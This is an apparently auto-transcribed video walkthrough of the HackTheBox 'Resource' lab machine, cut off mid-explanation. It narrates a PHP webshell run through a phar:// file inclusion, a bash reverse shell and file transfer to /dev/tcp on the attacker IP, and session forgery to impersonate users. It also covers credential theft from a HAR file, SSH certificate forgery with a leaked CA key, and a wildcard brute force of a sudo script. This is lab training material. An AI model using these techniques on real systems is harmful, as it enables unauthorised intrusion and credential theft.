What's going on YouTube? This is Ipsec. I'm doing resource from HackTheBox. And my favorite thing about this box is how it showcases the use of a certificate authority to sign SSH public keys for authentication, which is just a cool way to manage SSH keys, as not only does it eliminate having to manage 100 authorized key files, but also lets you assign expiration times on keys. So if you wanted to give someone access for a day, a week, a year, whatever, you can do that. But back to the box. There's two implementations showcased. Once you exploit a web app, you land on a Docker container and discover a old certificate authority file. And they say it's the legacy way, right? There's no principal file, so you just have to use this CA file to sign keys. If you sign it as root, then you can log into the Docker as root. Once you do that and enumerate the container, you discover a web API that is used to sign keys with the new CA. However, the web API is prohibiting you from signing keys that allow root access. But once you get onto the host box, you can discover there is a sudo script that has a vulnerability that allows you to read the root CA's file 1 byte at a time. So you just create a simple program to exfil this file, then you can sign a key that lets you in as root. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it resource. Then the IP address of 10.10.11.27. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and the banner tells us it's a Debian server. And now the interesting thing is, we also see the TTL is 62, where the other ones are going to be 63, so this box is one extra hop away. Most likely it's going to be running Docker, LVM, or something like that. The next port we have is HTTP on port 80. That is running on Nginx, and it tells us it is Ubuntu. And based upon the TTL, this is probably going to be the host, and this is running Ubuntu. The virtual environment is running Debian, so a little bit interesting there. The nmap script is telling us the web server is redirecting us to itrc.ssg.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.27, put this in. And then the last one we have is SSH on port quad 2. This one is a Ubuntu host, and the TTL is 63. So we do have 2 SSH servers. It looks like the one on port quad 2 is going to be the host, where the port on just 22 is going to be a virtual environment. So nothing really important there, just something we have to keep in mind, like if we get credentials, to try both of them. If we take a look at the website now, we get the banner that says welcome to the SSG IT Resource Center, and we can register and log in. But the very first thing I always like doing is trying to fingerprint the web application, and I like doing that by looking at the cookies and things like that the page sends. We can see the cookie is PHP sesh ID, so this is most likely going to be a PHP web server since it's giving us the default PHP cookie, right? Looking at the other headers, we see X powered by PHP 8129. And we could look at PHP release notes. So if I turn my intercept off, go to PHP release notes, go to probably the change log would be a good one. And then look at 8129. We can see this is June 2024, which is around the time the box released. So it is a fully up-to-date PHP version. The next thing that was interesting, let's see, we have a expires. And we see a date way back in time, Thursday, 19 November 1981. So this is just probably telling us the page has no caching, right? When I see dates set like this, sometimes I think maybe there's no framework at play. So Laravel or Cake PHP is not in play because frameworks generally handle this for you. And most of the time when they handle it, it doesn't go back this far. Sometimes it does. The other indication that no framework is at play is just based upon the cookie. Laravel and Cake PHP, all the other frameworks have their own cookie name, and you normally don't see PHP session ID. So just going off the bat, I'm thinking this is just a PHP app that just has hand jammed code. It's not like WordPress, things like that, just based upon cookies. We could look at 404 error messages to see what's here. This is just going to be the, oddly, an Apache error. The repeater server's Nginx, but we get a Apache error. Okay, so it looks like this is telling us probably there's going to be some type of proxy pass at play, right? because if we looked at nmap, we see the TTL is 63. And if we look at this error, this is Apache, this header is coming from Nginx. So it looks like we hit the Nginx server on the box, and then it proxies us over to most likely the Docker container, which is running Apache. And since we talked to Nginx first, that's the thing that has full control over the headers. So that's why we see the server header is Nginx, but the error here is Apache. Again, not really that important. It's just things to keep in mind when you're looking at an application, right? So let's take a look at what else the application does. So we had a functionality to register. So let's try registering an account. So we'll do ipsec and a password of password. And we get registration successful. So let's try logging in. And it lets us create tickets. So let's do new ticket. And the other thing I'm noticing is we have this page is equal to, and this is common with like local file inclusions, but we'll get into that in a second. I just want to create a ticket real quick. We'll do just a ticket with some like HTML in it. So if we see it bold, we know we have potential cross-site scripting, right? And it doesn't look like we have any. We can try to add a comment here. And again, we see this reflected back to us. So it's not cross-site scriptable. We could try cross-site scripting potentially like in the username. So if we logged out, registered a new user, we could try it there. I'm not sure if that'll work. Let's just try it. Let's do password of password again. Registration successful. And let's see. I guess we have to create a ticket. Where is my username? Subject. Okay, there we go. So no cross-site scripting there either. Let's see. So we have this page is equal to ticket. And most of the time when you see something like this, let's put it in Burp Suite so the font is a little bit bigger. There we go. So most of the time when you see page is equal to and then a name, this is just getting a page off the box, right? It's probably appending.php and including the page here. So we can test this out. If we do ticket.php, we just get window location is equal to /, so it served us a page. If we had something that didn't exist, we get a 404 page, right? So we know there are pages here. If we go admin, we actually get a page as well. Let's see, what's another thing? Index, right? So we get the index. So if we do page is equal to, like this, index.php, we just get a page here. Let's see. If we just do index, we may actually want to show this in the browser. So if I do page is equal to index, we get nothing. If we do page is equal to does not exist, we get my tickets. So if we get something here, it's going to include tickets. And if the page does not, like by something, I mean like if the file does not exist, it includes my tickets. But if the file does exist, it doesn't, right? So this is a good way to identify, I don't know exactly where I was going with that. I guess if we can do like a PHP filter, this isn't going to work because if you do a PHP filter to try to leak the source code and there's something that tests if a file exists or not before it includes it, it's not going to show it, right? So if we do PHP filter convert.base64 encode resource is equal to index, because a page is going to append the .php for us, we just get my tickets. And that's because it's taking this parameter, seeing if the file exists. If the file does not exist, then it treats it as a 404 and displays file tickets, my tickets. And this PHP filter isn't going to be a file exist. It's just a weird PHP-ism. So even though like the resource index.php exists, the call to does file exist fails on this. We did have admin.php. If I go to page is equal to admin, we can see admin tools. If we go here, we can also see a listing of all the tickets. So we see SSH access. If we try to click this one, we get unable to retrieve ticket. If we look at what request is being made there, let's see, it's just going to page ticket ID is equal to 3. So it looks like they are checking if we're like owner of that ticket or something like that. So let's go back to that page is equal to admin, look at the other functionality. So we have this check if server is up. So let's try intercepting this request. So we do 10, 10, 14, 8. Click go. It's doing mode ping and then 10, 10, 14, 8. So we could try a TCP dump. So sudo TCP dump -I ton 0 ICMP. Send this, and we can see the server does ping us. And ping requires a special capability, right? If I do a get cap on user bin ping, we can see ping has the capnet raw, which allows ping to work. Most of the time, like PHP and those other binaries won't have this capability, so they can't do ping. So because it needs the capability, most likely there's going to be like a system call around this, right? So it's not just PHP code that's doing the ping. They do like os.system and then exec ping. And when they do that, it can lead to command injection, right? So this is a common one to test for command injection. If we do a $, we get invalid host, a single quote invalid host. So it looks like all the like dangerous characters are invalid host. I wonder if we can do host names, right? So let's try localhost. It looks like we can. If a host doesn't exist, we get that weird debug parameter. But this is functional. Let's try again special characters with the host name. And it looks like they do have decent filtering here, right? We could try like inserting a line break as well, and we just get internal server error, probably because we broke JSON. If we do like a backtick, we get invalid host. So let's see. The next thing we could try is changing the content type and doing some type of type juggling. Because when I tried to do a line break here, we broke JSON completely, right? But if we do change this to, what is it? HTTP post request, content type. Probably have to turn intercept off. I forget exactly what it is. Content type, it's like octet something. Let's see. Content type, application JSON. I wonder if we have something in our history. Wow, we went to developer Mozilla a lot. API register. There we go. This is what I want. XWW. This is the content type I wanted. So we could try putting it like this. And then we want mode is equal to ping and host is equal to localhost, and see if the application still works. It does not. So it's not letting us do other content types. And I was just thinking we may be able to smuggle a line break easier this way. I don't know if you can, but it's just like what I would try. And since I've tested everything I know about right now, I'm going to move on to the next field because that may just not be vulnerable, right? Tested what I thought, did a little bit of type juggling to see if there's like another avenue I could research to see if I could smuggle in line breaks if it wasn't JSON. Can't. So let's now test provision AD user. So if we go here and try this, we just get success true. And we always get success true unless we break JSON with something like a backslash, because backslash is escaping this quote. If we did a double backslash, then that's fine. But I can't figure out exactly what this does. No matter what we do, it's saying true. If we do a user that exists, like IPsec, it still says true. So I don't know exactly what this field does. We could try sending this to FUF and see if there's any extra modes we could try fuzzing, right? If we just did user provision and had nothing, it would be success true. So maybe if we had like a secret function here, it may respond with data, like not a 500 error, and we know we could do something, right? What if we did ping, right? So both ping and user provision does give a 200, so that could allow us to enumerate hidden functions, but I don't think there are any, so I'm not going to waste time with showing you FUF. It's just something I would normally look at, right? Especially because we see this provision user SSH is disabled. So there could be like an extra function hidden behind this, right? If we inspect what Go does, let's see. Is this going to be quick to show? Let's see. That's disabled. Where is this one? Button provision type. I can't see the HTML that's telling us this goes to user prov for provision user. We could probably see what this mode would be if we just looked at the HTML enough, but nothing too interesting there. I want to go back to create tickets, right? Because we just tried creating a ticket with cross-site scripting, but it did allow us a file upload. And remember, we do have a local file inclusion. We just had to be able to specify a page that ends, a file that ends in PHP, right? And this is telling us it wants us to upload zip archives. So if we give it a zip archive, we can tell PHP to go inside of that zip and access a file. So let's do this real quick. I'm going to do v-cmd.php, and let's just create a quick PHP script. So we'll do system request cmd, like that. There we go. And then we want to zip this up. So we'll do zip cmd.zip like this. And then we can browse. And we want to attach this. So htb resource and then cmd.zip. Upload or create ticket. And if we go to a ticket, we can see we have uploaded this file. And if I copy the link, we can put that here. And the one thing I want to test real quick is how this is being generated, because we see this hash, and this is going to be the file name, right? So before we even try like the local file include attack, I want to see if we can guess file names. So we look at that. It's 40 characters, which is going to be a SHA-1 sum. So what I want to do is say echo-n cmd.zip SHA-1 sum. And that's 22F. Let's get rid of that -n, 53. If we did SHA-1 sum of the zip file itself, we get that. So we have identified the logic on how it's creating the file names. And it's not going to be useful to us. If it was just based upon the file name and not the file contents, then I would get a word list like RAF small words, right? And then append.zip to everything, SHA-1 summit, and then send it to a Durbuster, right? And then if anyone uploaded a zip to that /uploads, we'd potentially be able to download it because we just know the file name, right? So that attack doesn't work, but we could potentially abuse the LFI. So let's go back to where that was. Do we have it here? Page is equal to index. So we want to go and grab this page. So if we do page is equal to this, and then we can just treat this zip as a folder and say CMD. And we can do we can try zip first and see if that does anything. We get the default page. So this didn't work. This is just showing us the ticket. So we know the file did not exist. Another common wrapper is going to be the phar. And if we do that, let's see, we get a undefined key CMD in this. So this one actually executed, right? So if we now try and CMD equals who am I, we can see we have successfully executed code. So let's send this over to a post request or see if we can, because it's a bit easier to get a reverse shell in a post request. You could do it in Git, but I just like doing it in post because it's a little bit easier. So if we try this, are we going to get an error message? No, we have the ticketing there. So even though this is a post request, we can still send parameters this way. And even if the code is saying like a GET request, like if the parameter is GET like this, or it would be page, right? And we sent a post, because we put the page in the GET parameter, this request is still going to pull it. So let's test this out. We can see warning, there we go. So we can do CMD is equal to, let's do --c, --i, dev TCP 10.10.14.8, 9001, 0 and 1 like that. And then we will URL encode this. And then we want to start up a listener. So nclvnp 9001. Send this request. And the page is hanging, which is a good sign because we got a shell. So let's try Python 3-c import pty, pty spawn, bin bash. And Python 3 is not found. Which Python 3? Nope. Let's see. Which script? Script does exist. So this is another way we can get a good TTY. We're going to say this shell is going to be bin bash. Otherwise, it's just sh and becomes slightly a pain. So we do shell is equal to bin bash to set the environment. And then we do script -q dev null. And now we can do the normal thing, stty raw minus echo foreground. And then export term is equal to x term. So we can clear the screen. And we have tab autocomplete and everything like that. So with the shell on the server, the first thing I like always doing is looking at the database, right? Because the database is going to have some type of credential. We have the username of JJ and this password. So we probably should take note of this, maybe run netexec on SSH and try logging into both hosts. But that doesn't really get us anything, so I'm not going to waste the time. I'm just telling you, those are the type of things I would be doing as I'm solving the box, right? So let's do mysql-u jj-p and put in the password. We can't connect to the host. The host is going to be db. There we go. And then the database name is resource center. So let's do use resource center, show tables, and we can select star from users, and we see a bunch of hashes, right? So we could export this, send it over to Hashcat and try cracking. None of that cracks well. We could also update the passwords of users. So we could change ZZINTER to be our password. Then we can log into the web application as admin and see if there's anything. But I'm going to show a different way to impersonate users in just a minute. So I hate making changes to databases because that's not really OPSEC friendly. You can really screw things up. When there's safer ways, you should always opt for the safer way, right? The other thing I would do, we could do show tables, select star from tickets and look at all the tickets and get all the data out. Again, we could read the tickets here, but I'm going to show a slightly different way, right? We have tickets and it's pointing us to various upload files, but it's not really a user-friendly way to read these messages from an SQL dump, right? I would definitely run this query, save it to my box, and so I have it. But then I'd go and try to find a safer way. And the safer way is going to be just editing our PHP session on the server, right? So we do /temp, most likely it's going to be. We can find where the PHP sessions are. So we see the PHP session there. And let's go back over to our browser. And I'm going to remove our session. So let's go storage. Let's delete this. And then let's refresh the page. So we should get a new cookie, right? There we go. So our cookie is going to be D8C1. So if I cat sess D8C1, it's blank. Do we have a cookie that has data? So I'm just going to copy this session, the E0D, to sess, what was it? This, and we should fix our lines. So stty-a 28110, stty rows 28, columns 110. So this way I can just have my cursor go all the way to the end and it doesn't like wrap around like you just saw it do there, right? So if we now count our session shows us logged in as test. So if I refresh the page, we're now logged in as test. So what we could do is edit this session. And if we try to edit it to be 1 real quick, we write it, we get a weird error. Failed to decode session object. And looking at this, it's probably because how PHP works. This is going to be username saying, I guess, string of 11, and this is 11 characters. Role string 4 characters. Then we got ID, string 2, 1 character. So we want to change that to be 1, right? And then we refresh, it still errors out. And the reason this is happening is because Vim is adding a line break at the end, right? So if I just do, let's echo -n nothing to test, right? And do lsla on test, we see it 0 bytes. So lsla test down here. If we vtest, we're not going to go in input mode or anything. I just write, right? And now I look at it. Oh, it's still 0. I thought it'd be 1. XXD test. Do we have any data? We don't. Maybe my Vim is set up slightly differently. This is adding a line break. Let's see. There's got to be a good way to show this. Let's do nclvnp 9001. Send the shell. My session ID is dead there, I think. Okay, well, that sucks. So Vim is adding a line break, I believe. I'm not positive, but if I do set binary, so that will disable it. I think you can like also set end of line or something off, but just doing set binary, then we write it. We go back to the page, refresh, and it's no longer doing that thing where it kills our session, right? We just don't have any tickets. What's going on? This is it from the future. And after recording the video, I figured out what the mistake was, why I couldn't show it. And Vim only adds that end of line after it writes content to a file. So if the file is blank to begin with, it's not going to add that. If we just put a single character in, now we see it wrote 2 characters. If we XXD it, we have 0A, which is going to be the, maybe it's not end of line, maybe it's end of file. I forget exactly what 0A is. If we do man ASCII 0A, yeah, it is new line. So it adds that new line if it writes content to the file. If we set the mode to binary, sometimes this will stop it. As you see on my host though, it's not stopping it. It still wrote that new line, right? We could kill this file, remove test, vim test, set binary, and then write a character, and it still wrote it. As you'll see on the target, all I had to do was set binary. I think it's based upon like Vim version. There is also a no EOL, which means no end of line. So if we set this and then I write the file, we XXD it, it no longer writes that 0A. So that is the behavior I was trying to show. Let's get back to the box where we were editing the cookie to change our ID to be another user. So let's try session ID is equal to 2. Save it. Refresh. And now we can see SSH key signing broken. So we got a ticket here. Admin panel is supposed to allow me to get signed certificates, but it just isn't working. And we see ZZINTER saying upload the HAR file, and this user attaches it, right? And the HAR file is a browser diagnostic file, I guess I should say. And we'll go into this in a minute, but let's just save this real quick. HTTP resource msainristil.har. Man, I probably butchered that name. But what else were we looking at? Let's go back here. We change the status to all. Nothing. If I put this back to 1 and we look at all tickets, force to save, open all, there we go. We got decommission old SSH server. So we can see msainristil is saying the new system's super flaky. It won't work. Old certificates have been taken out of Etsy. I've got the old signing cert secured. The server will trust both old and new for some time until we work out issues. So they're doing something with certificates, right? SSH certificates to be specific. So that's just something to keep in mind. But hopefully you enjoyed like the whole like editing the session ID to change users, right? The other thing we could look at, again, we already downloaded the file, but if you didn't play with the sessions, if you look just in the uploads directory, you'd have a bunch of zips. And you could do like unzip-l, specify the zip, and you can get the HAR file this way, right? So we see the same file we downloaded, we can get this way as well. And if we look at this, this is a zip. I know it's a zip because it says PK. That's the magic bytes for that. So we should move this to be msaint. I'll just call it test.zip. Let's unzip it. And we have the HAR file. And this is just going to be JSON data, right? And what a HAR file is really is it captures a lot of just browser session data for debugging purposes, right? This was in the, I think it was the Okta breach, right? So if we Googled Okta breach HAR, there's a good reading on just like the background of it. Essentially, some unauthorized user got access to HAR files that people are using to troubleshoot Okta, and then some sensitive information was included in the HAR file that allowed them to access other services, right? So if we just went to Google and did like online HAR analyzer, I think we have a nice GUI where we can analyze it. So let's go HTTP, resource, specify the HAR file, and we can see what it looks like, right? So we have the pages, and if we don't really know how to use this well, so we can see like all the pages it gets is getting CSS. If we click on something, we can see information about the request, the response, etc., right? So we could filter out things. In terms of filter by, we could say post maybe and show us post request. But this is what a HAR file is. It's so they can get information about it. This is showing like how long it takes to load pages, things like that. But all we're concerned about is sensitive data being in it. And when searching through sensitive data, I like just using command line utilities because tools like grep are just so good, right? We could just grep-i pass on the HAR file. Gives us a lot of data, but this one is a super long line. So if I just piped it to like less-S to disable line wrapping, we can see it only matched on 4 lines. And the very first time it matched, it includes the username and password. So why does this actually exist in the HAR file in the first place? Well, to understand that, we have to kind of look at exactly the format, right? So we see this is just JSON data. It starts with log. Then we have pages. And we can see page 5, page 6, page 7, page 8. And then we get entries, right? And this entry's off of page 5. So why we have a lot more entries than pages? Because page 5 could load a lot of things, right? This is just getting the title. You got the CSS, the JavaScript, everything here, right? In the pages, it's just, think of it like a tab, right? This would be one page, but it probably downloaded images. Maybe it didn't download images because there are no images on the page, but that's not like the image is not considered part of the page, but it would be part of the request. So maybe ID, like maybe request 5, request 6, request 7 may make more sense to you, but we can see we go here, we got login, we got API login. So I bet if we looked at page 7, right, let's see, login, we go down to the entries, we can see all the headers associated with that request, and then the cookies, and then post data, and then the text. So the reason why the password showed up is because it's logging post data. Headers could also be sensitive, like if they're using some type of API and it puts some like bearer token. I think that's how the Okta breach was. There was a bearer token in the header, and that was included in the HAR file, right? But the HAR file just includes a lot of sensitive information. And if you didn't want to manually parse it, you could always use a tool like JQ. So what I would do is JQ dot, and then let's see, we want to go into the entries, right? It was probably log.entries. There we go. And then we see we're in a list. So I'm going to do open and close. And then what? We want probably post data. Let's see, what is post? So we're in the entries. Then we probably want to go into request. And then, so we do entries, request, and then post data. And we can see all of this, right? And if we wanted to, we could also like just see all the post request itself. So we do entries like this, and then we do -C, it's going to put it in compact. And it puts every entry just on one line. So if we now grep for post in all capitals, this is going to show us all the post requests, right? There are 3 post requests in this. So then we can just now pipe this back to JQ. And then we can see all the post requests in this. We could go back post request, what was it? Request post data, right? And we can see it this way. But I would definitely get familiar with JQ because knowing this tool just helps so much when you start filtering out data. But we see a username and password. So let's try SSH 10, 10, 11, 27. And we need to specify the user. And this doesn't work, then I try on port 2222 to go to the host. I probably should try it on both anyways. Let's see. Copy, paste. There we go. And we get logged in. It doesn't work against port 2222. We can show that real quick. SSH msainristil at 10, 10, 11, 27. At least I don't think it works, right? No. Okay. So we get logged in, and the very first directory we see is this decommission old CA. And if we look at it, we have CA ITRC and CA pub, right? And if we look at this ticket, old certificates have been taken out of Etsy. I'm guessing he's talking about the host system here. This server will trust both old and new for some time. So the server that we're on may still trust this decommissioned CA, right? So the way we can check is go into Etsy SSH. We want to go into the directory. Then SSH Config probably. And we can see sshcerts.conf. And this line right here is going to allow the a certificate authority to sign public keys and let them log in through SSH. It's a really cool thing. So let's look at this file, and that's just in the Etsy SSH directory. We saw it right there. So if we cat this file, we have the public two public keys. This is probably going to be the new one. I'm saying new just because it's using a newer algorithm, the ED255191. This is just using RSA. But we have this long key, right? And if I go into the decommissioned CA, and we cat this, whoop, not that one, the pub, that looks very similar to the one in SSH. So if we cat this, so AAA, it ends with S equals. I already copied that in my clipboard, so we can also just grep paste this against the CA-ITRC.pub and see it's a direct match. So the SSH server is still trusting this CA certificate. So I'm going to copy the private key down to my box, and then we're going to assign a public key with it and see if we can log in, right? So I'm going to copy that. Let's go back to my box here. And let's see, we can do make dir, I'll do old CA. And then let's generate a key. So we'll do SSH-Keygen. Let's use the new signing algorithm just because it makes for easier things to copy and paste because it's smaller. I'm going to call this, I'm going to create a certificate with root. There we go. So let's v old CA, paste this in. And if I just try sh-i root at 10, 10, 11, 27, it doesn't work, right? Because we just made this key ourselves. So what we want to do is sign it. If we do SSH-Keygen and look at the manual page, we can see, let's see, probably right here, SSH-Keygen -i is going to be the certificate identity, then CA key, the N is going to be the principal, this is going to be the username. The validity interval is pretty cool. We could set an interval so like the key expires in 10 minutes. So you could give someone an SSH key and then it would just automatically expire in 10 minutes. So you don't have to go back in the host file and remove it. But let's do this. We will start off with SSH-Keygen and then -s old CA. This is going to use the certificate authority. Then we do -n for the principal. So we'll do root. I'm going to do a validity interval just so we can see it. I'm going to say 5 minutes and we'll do 42 weeks. And let's see. The next thing we do is the certificate name, which is root.pub. Invalid So we do plus 42 weeks, so we can add that. And we need the I. This was the identifier, and this doesn't matter. So we'll just call this IPsec real quick. And we have to chmod 600 on old CA. There we go. And there we go. We have signed the root cert.pub ID IPsec. So we can do SSH-Keygen -L is going to list. And then file, we'll do IPsec.pub, I think. Or maybe it's IPsec. It created the -cert, right? Root.pub, not a certificate, root cert. There we go. So if we look at the certificate, we can see it's valid from 5 minutes ago to 42 weeks, right? And the principal is going to be root. If we wanted to, we could have also done like forever here. And then if we do that again, we can see valid, and it just says after, right? Because there's no end date. So let's see. We can leave that. That's fine. So let's try SSHing now. So we'll do SSH-I root and then specify root there. And it lets us log in now. The same key we tried just a couple minutes ago, it's now letting us in because it uses the pub key. It doesn't say, let's see, if we do a -v, it probably will. Let's see. Do we see cert? Remote cert, accept. I'm not exactly sure how to see it in the SSH output. Maybe it's right here. Host key algorithm, ECDA, cert v01. I think this is going to be us setting the signed thing, right? So that lets us log in. We are now root on this container. If we do an ls, there's nothing here. If we go into home, we can now access ZZINTER. So if we look at his directory, we got user.txt, and then there's also this sign key API.sh. And if we look at it, it is just a bash script. We got supported principals here. So we got web server analytics support security. And if we look, it's just going to do a curl against signserv SSG HTTP and then sends information. So I'm going to add this to my host file. I'm going to just run the script locally because that's going to let me edit it a bit easier. And it'll also like make it easier to view exactly what's going on. So let's do a make dir. I'm going to call this ZZINTER. And then we will copy the script. Let's just cat it over instead of copy and paste. nclvnp 9001. I'll call it sign.sh. And then we can cat this file, pipe it over to dev tcp 10.10.14.8 9001. That sends the file over to us. And now we can just edit it. And I'm going to add a -x. And this is going to be proxy, right? So we do localhost 8080. And now this script is going to send it through Burp Suite, right? So if we just look exactly what it is, usage, we got the public key, the username, and principal. And right here, it sets the IFS. This is internal field separator, I believe, as comma. So this is like doing an awk split on comma. And that loops over each word in this, and make sure we choose a principal that's web server analytics support or security. And then it sends the pub key. Okay, so let's do another key gen real quick. TED25519, and we want to give it the file name. I'll give it ZZINTER, I guess. It's really confusing, the file names, because we sign it, it gets a principal name, and we don't exactly know what the principal name is until after we sign, right? So let's do bash sign ZZINTER.pub test, not a supported principal. Let's do test support. And did that even go through Burp Suite? It didn't, probably did, but stopped. So we can see we do pub key, username, and principal. So if we do username of test, principal of support, we get a key back. And let's see. cd ZZINTER. We want to make this key. So we call it v zzzinter-cert.pub. Paste this in. And then SSH-Keygen-L. We've got the -f. We can see the principal on the certificate is support. So if we try SSH-I ZZINTER support at 10.10.11.227, or not 227, 27, we get password. Let's do the actual host. Remember, there's 2 SSH servers. So I do port 2222, and this lets us log in. So now we are the support user. And if we go to etc SSH, and we see a new directory here. This is auth principals. If we look at SSH config, we got SSH certs here. And this one's slightly different, right? We have the trusted user CAs, and if we cat this, this is going to be the new key. So this is why that old certificate did not work on the host, because the new server or the host server only trusts this new key. The old one, if we go back to here, SSHD, we have to cat this pub file real quick. This is the old web server, right? The Docker container. We have 2 keys. So the host only has this one and doesn't have this one. This is where the old CA was. It looks like this API server is using the new CA to sign keys. And if we look, it's also got an authorized principal file. So that is going to be the different configuration. You can think of the principal file like as, I guess, groups. So if we look at auth principals, we have root, support, and ZZINTER. If I cat support, we have 2. We have support and root user. These are the principals that support is allowed to use. So when a login attempts, like when we try to log in with a certificate as support, it cats this file and says, is your principal one of these? If it is, that lets us in. So if we look at the principals that's allowed for root, we need root user. So if we go here, we can specify root_user, and root access must be granted manually. So let's try some basic ways we could potentially bypass this check. So if it's just checking if root user is equal to principal, we could probably put a space beforehand or a space afterhand, and no. So it looks like maybe it's trimming spaces, or the check is if root user is in principals, right? We could check if it's in if we do SA root user. So it just checks if this string exists. So my next thought would be maybe we could try to encode something. I'm going to just do %42 to URL encode something. I don't know if that's the correct thing for E, but it doesn't really matter because all I want to do is check this out, right? So I'm going to copy this key. Then we can do V, or we have to go into the directory. So we were in ZZINTER. And then go into the cert, delete, put the new one in, SSH-Keygen-LF here. And we see the %42. So it didn't attempt to URL decode it after it went into principal. So again, what I was hoping is when it does the check, it sees this, and then for some reason it decodes the URL and then put a character in. 42 is probably A or B, right? It's probably A or B. Let's do man ASCII A. It's capital B. So I was hoping I'd see that, but nope, I don't. So no way to really bypass that. We could look at the other users principal, right? There was a ZZINTER. We're just the support user. And we got ZZINTER temp. So let's add this role. So if I add the role, I say role, I mean principal. So we add this principal. We copy this. And then let's go back to our key. Right? And V this, delete, put, keygen. So I look at it. The ZZINTER cert has the principal ZZINTER temp. So if I do SSH-I ZZINTER, ZZINTER at 10.10.11.27, make sure on port 2222, it's going to let us in. because it cats the etc SSH auth principal. Since I try to log in, it cats this file, looks at the principals here, and says, oh, you have the right principal. You can log in as this user, right? So if we look here, we got user.txt again. We can do sudo-l and see ZZINTER is able to run the script opt-sign-key.sh. So let's look at exactly what the script does. I'm just going to pipe it over to, actually, let's look in Vim. So we have syntax highlighting, right? That's better. So we specify the CA file, give it the public key, the username, principal, and serial. So let's see, if we don't have 5 arguments, it prints the usage. It's going to start off by saying if the ITCA is equal to the CA we specify, and we're catting both of these files and checking the contents, then it says use the API server to sign with the CA. So it doesn't want us to sign keys with etc SSH CA IT. If we try to view this file, do we have permission to? No, we don't. Only root can read that file. But the interesting thing here is when it was doing the comparison, these are not in quotes. And because it's not in quotes, wildcards are allowed. So we could brute force the contents of this file 1 character at a time because we control what this variable is going to be. So if we, let's see, what's a good way to show this? We can just demo it, right? The CA certificate is going to start with dashes because it's like begin whatever, right? If I cat the old CA, we look at it, it starts off probably with begin open SSH private key is my guess, right? So let us run this. So we do sudo-l, we can sudo this and see the thing. So it wants a CA file. So let's just do echo dash to dev shm test CA, I guess I'll call it. If I cat that file, it's just 1 dash. Awesome. So we'll do sudo opt sign key opt sign key.sh. Okay. Dev shm test CA. Public key file. I'm just going to give it user.txt. It doesn't really matter. Username, principal, serial does not matter. The principal actually needs to be something of that. So we'll do support. Serial has to be a number. Okay. So we have all the arguments right. So right now it passed the check and tried to load in the CA, right? If I go back into the Vim, we passed it right here. And then I guess it tried to load the public key file and failed because, oh no, that's just checking if it's a file. We got here, we read the principal. We got there. So it failed on SSH-Keygen. It tried to read the CA file. It wasn't real CA and it just errored out. We have error in libcrypto, right? So if we edit this, so dev shm, was it test CA? I'm going to do --, right? And we're going to run that sudo again. And now we have a different error message. We have use API for signing this key. So we have just validated the first character in that is a dash. If we did -a, we're going to get this libcrypto error, right? Because it's --. We do it again, error. So based upon the error message, we can enumerate this file 1 character at a time. I'm going to go cat the old CA and let's just see if the first line is going to be this. So we can copy, V, paste that, and then do a *, run it, and that looks good, right? So now what we have to do is figure out what the first character after this is. And honestly, it's going to be B. And I know that because even though you may think this is just purely random data, it's not exactly. Let's see, we have an error because we don't have a *. We have to do a line break like that. There we go. And I say it's not fully random because if we grab the contents of this, let's just do CP, old CA to T, VT, delete the dashes, base64-DT. We see it starts off with like the algorithm, and then we got a bunch of random data here, right? So that's why I knew the first bit would be B, because it's just doing a base64 encoding of OpenSSH. So if we base64, B3B, that's why we solve that. But long story short, we just have to build a script that is capable of writing to this test file, running the sudo rule, and then checking the output, right? The last thing I'm gonna do before we jump into creating that script is talk about how we're going to identify a success and failure, right? If we just run this, we could also like compare the string output and just say, if we see this error, then we know it was correct. If we see the other one, it was bad. You could also look at the exit code, and that's what I'm going to do just because I like using exit codes more than like scraping the screen. Scraping the screen, like looking at the strings. So we look at the exit code for this. It's just 1, right? If we edit the test CA, I'm going to get rid of this so it doesn't match, right? If we run this again, then we get the status code. It's going to be 255. So on a file does not match, it's 255. On the file does match, it is 1. And then the last thing I want to point out again, the vulnerability here is because this if then, or this if statement wasn't using quotes. If they had quoted this, then it would be a direct comparison and wildcards don't work. But because they didn't quote it, wildcards work, and that's why we can brute force it. So let's make the exploit now. I'm going to call this Keygen brute, I guess. I don't know exactly what to call it. And we could do Python, but I've been using Go a lot more lately than Python. So I'm going to create a Golang program to do it. If you want to see a Python program, I'm sure OXDF straight up is going to do it in Python. But for me in my videos, when it's simple enough, I'm going to be using Golang. So I'm going to initiate the project with go mod init keygen brute. And then I'm going to touch main.go. And then let's open up Visual Studio Code. And we'll begin the program. Okay. VS Code is loading. It takes a little bit. My computer is going slow. So we do package main. And I want to make this font a little bit bigger, I think. Let's see. Is it edit preferences? File. Edit. I'm going to pause the video. We're going to make this font a little bit bigger, and then we will get on with coding. Okay, so let's start the program off with the func main. And let's create the character set. So I'll do character set is equal to, it's going to do lowercase a, b, c, numbers. I'm going to add the dash, slash, equals, and plus. Those are the like special characters used for base 64. And then we also need spaces because in that header, like the begin SSH key, it does use spaces. And the other thing I'm going to do, I think there's more capital letters than lowercase letters. So I'm going to put the capitals first because I think that will make it go faster. I'm not positive. It doesn't really matter. And then we also have to add a line break. So do char set plus equals, and then string rune of what is a line break. Line breaks that. Decimal is 10. So that adds line break. Okay. And I think in Golang, if I just did \n here, it wouldn't, does it add it? I don't know exactly. FMT print line. Let's see. Do we get \n or just n? Go run main. Oh, we do get that. So we don't need to do the string rune. We can just add line break like that. I wasn't sure if it would process that. So, okay. We got the character set. So now we have to create the file. So I'm going to do file error os.open file. Then we're going to open dev shm. I will call it CA. And then we give it the OS. Let's do the create flag. It's open, create. There we go. We need write only. And I also want to give it the truncate flag. So every time we open the file, it essentially erases the file. Because if we don't add that and then the file started out with something, we'd write to it and we wouldn't expect the file to have contents and it may just do odd things, right? So this way, we always, whenever we open the file, get a clean copy that's blank. So if we can't open the file, let's just panic out. And then the defer statement means when main exits, it's going to run this file.close. So it just makes sure the file is closed soon as it exits. So now we want to start with our output. So I'm going to do output is equal to, and then we're going to cheat and give it a few characters to start out with. So because we know it starts out with that begin SSH private key, we can do that. Let's do head-1, grab this. That's not copying the whole thing. There we go. \n, there we go. And we'll print the output. Man, once I like zoomed in, that like autocomplete is becoming really obnoxious. So we want to do a essentially infinite loop because we're going to exit once the file's done. We don't know exactly how, well, we don't always know how long it is. We could actually not use a blanket loop because if we look at the box, let's see, go here, LSLA, Etsy, SSH. The 